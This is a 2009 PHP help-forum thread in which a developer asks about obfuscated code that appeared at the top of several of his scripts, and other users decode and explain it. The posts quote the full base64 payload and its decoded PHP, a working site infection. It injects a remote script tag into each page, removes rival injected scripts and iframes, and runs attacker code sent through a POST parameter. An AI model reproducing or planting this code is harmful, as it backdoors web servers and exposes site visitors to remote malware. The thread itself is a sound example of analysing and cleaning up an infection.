pustulio Posted October 15, 2009 Share Posted October 15, 2009 <?php eval(base64_decode('aWYoIWlzc2V0KCR3dzdqMSkpe2Z1bmN0aW9uIHd3N2ooJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyUmhaSFJvYVc1bkxtTnZiUzlvYjNsc2JXRnVZMjl1YzNSeWRXTjBhVzl1TG1OdmJTOXBibVJsZUhJdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiB3dzdqMigkYSwkYiwkYywkZCl7Z2xvYmFsICR3dzdqMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkd3c3ajEpKWNhbGxfdXNlcl9mdW5jKCR3dzdqMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd3dzdqJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3d3N2onKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kd3c3amw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3d3N2oyJykpIT0nd3c3ajInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?> Hey guys, I figured this would be the best place to find help on this. A friend who was using an app I wrote a long time ago (that just tracks data in a mysql table) sent me an email that it stopped working because he got a php error. I had a look at the scripts and somehow this codesnippet found its way into the top of a few. Mainly the sql include file, the index file, and the settings file. I echoed this out to see what it was, and it was a bunch of obfuscated code that I couldn't decipher. I have a feeling its not very nice. Could anyone help me out? Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/ Share on other sites More sharing options...
RussellReal Posted October 15, 2009 Share Posted October 15, 2009 it evaluates this code: <?php if(!isset($ww7j1)){function ww7j($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RhZHRoaW5nLmNvbS9ob3lsbWFuY29uc3RydWN0aW9uLmNvbS9pbmRleHIucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function ww7j2($a,$b,$c,$d){global $ww7j1;$s=array();if(function_exists($ww7j1))call_user_func($ww7j1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='ww7j')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('ww7j');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$ww7jl=(($a=@set_error_handler('ww7j2'))!='ww7j2')?$a:0;eval(base64_decode($_POST['e'])); ?> Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-937130 Share on other sites More sharing options...
pustulio Posted October 15, 2009 Author Share Posted October 15, 2009 cheers mate, I managed to get that far but I don't know what the purpose of the code is. I know for a fact I didn't put it there! Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-937137 Share on other sites More sharing options...
RussellReal Posted October 15, 2009 Share Posted October 15, 2009 do you use any free hosting service.. or is this for a blog or whatever that allows php code.. if so all this code does is check for script tags and stuff.. atleast from reading teh regex thats what I gather Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-937139 Share on other sites More sharing options...
pustulio Posted October 15, 2009 Author Share Posted October 15, 2009 No we use a payed hosting service, but it is shared hosting so there are more domains on the server. Its not a blog either, only one person has access to this app and he doesn't know anything about programming. When I echoed the code out in the browser, this URL managed to make an appearance: http://dadthing.com/hoylmanconstruction.com/indexr.php Once again, stumped. Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-937143 Share on other sites More sharing options...
f1r3fl3x Posted October 15, 2009 Share Posted October 15, 2009 I had a similar problem. On every page of my website there was a code similar to this, but it was only HTML. It was an iframe, pointing to a website. This was made through a hole in your host's security. You should contact them and notify them of this. Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-937272 Share on other sites More sharing options...
Mchl Posted October 15, 2009 Share Posted October 15, 2009 Basiacally it tries to inject the script from http://dad thing.com/hoylmanconstruction.com/indexr.php into your page. Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-937289 Share on other sites More sharing options...
pustulio Posted October 16, 2009 Author Share Posted October 16, 2009 Thanks heaps guys, I have emailed the our hosting about this. Hopefully they have something good to say. Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-937812 Share on other sites More sharing options...
scanreg Posted October 16, 2009 Share Posted October 16, 2009 <?php eval(base64_decode('aWYoIWlzc2V0KCR3dzdqMSkpe2Z1bmN0aW9uIHd3N2ooJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyUmhaSFJvYVc1bkxtTnZiUzlvYjNsc2JXRnVZMjl1YzNSeWRXTjBhVzl1TG1OdmJTOXBibVJsZUhJdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiB3dzdqMigkYSwkYiwkYywkZCl7Z2xvYmFsICR3dzdqMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkd3c3ajEpKWNhbGxfdXNlcl9mdW5jKCR3dzdqMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd3dzdqJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3d3N2onKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kd3c3amw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3d3N2oyJykpIT0nd3c3ajInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?> How did you decode this? Thanks Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-937969 Share on other sites More sharing options...
Mark Baker Posted October 16, 2009 Share Posted October 16, 2009 How did you decode this? Simply delete the eval() and echo the result of the base64_decode <?php echo base64_decode('aWYoIWlzc2V0KCR3dzdqM........=='); ?> Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-937982 Share on other sites More sharing options...
scanreg Posted October 16, 2009 Share Posted October 16, 2009 Ah, okay, thanks Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-938029 Share on other sites More sharing options...
bossman Posted October 16, 2009 Share Posted October 16, 2009 that code is a hack....delete all your remote files immediately, and simply redrag your site over to the server and it will be gone... Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-938038 Share on other sites More sharing options...
knsito Posted October 16, 2009 Share Posted October 16, 2009 that code is a hack....delete all your remote files immediately, and simply redrag your site over to the server and it will be gone... Well this is a quick fix, but he should find out where the attack vector came from and have that patched. Problem could (most likey will) re-occur if the security issue is not fixed. Quote Link to comment https://forums.phpfreaks.com/topic/177731-solved-anyone-have-a-clue-what-this-is-it-somehow-appeared-on-a-few-of-my-scripts/#findComment-938048 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.